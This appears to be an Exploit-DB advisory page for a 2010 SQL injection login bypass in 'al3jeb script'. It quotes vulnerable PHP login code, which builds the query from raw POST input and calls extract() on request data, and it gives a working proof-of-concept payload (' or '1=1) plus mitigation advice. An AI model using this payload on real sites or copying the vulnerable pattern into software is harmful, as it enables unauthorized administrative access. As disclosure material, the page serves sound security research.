al3jeb script Remote Login Bypass Exploit

vendor:

al3jeb script

by:

cr4wl3r

5.5

CVSS

MEDIUM

Remote Login Bypass

287

CWE

Product Name: al3jeb script

Affected Version From: Not specified

Affected Version To: Not specified

Patch Exists: No

Related CWE:

CPE: Not specified

Metasploit:

Other Scripts:

Platforms Tested: Not specified

2010

al3jeb script Remote Login Bypass Exploit

This exploit allows bypassing the remote login functionality in the al3jeb script. It only works when magic_quotes_gpc is turned off. The vulnerability exists in the login.php file, where user input is not properly sanitized before being used in a SQL query, allowing an attacker to log in without a valid username and password combination.

Mitigation:

To mitigate this vulnerability, enable magic_quotes_gpc or use proper input validation and parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |      al3jeb script Remote Login Bypass Exploit     |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------

[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Date: 19.01.2010
[!] Remote: yes

[!] Vulnerability Code [login.php] :

<?
session_start();
extract($_POST); 
extract($_GET); 
extract($_SESSION); 
extract($_COOKIE);
?>
<?php
include("Connections/config.php");
if(isset($_POST['Submit']))
{
 $u=$_POST["uname"];
 $p=$_POST["pwd"];
 $r=mysql_query("select * from admins where AdminName='$u' and AdminPass='$p'");
 
if($row=mysql_fetch_array($r))
{
 $_SESSION['AdminName']=$u;
 if(isset($re))
 {
 setcookie("username",$u,time()+3600);
 }
 header("location:index.php");
 
}
}
?>


[!] PoC: [al3jebscript]/login.php

    username : ' or '1=1
    password : cr4wl3r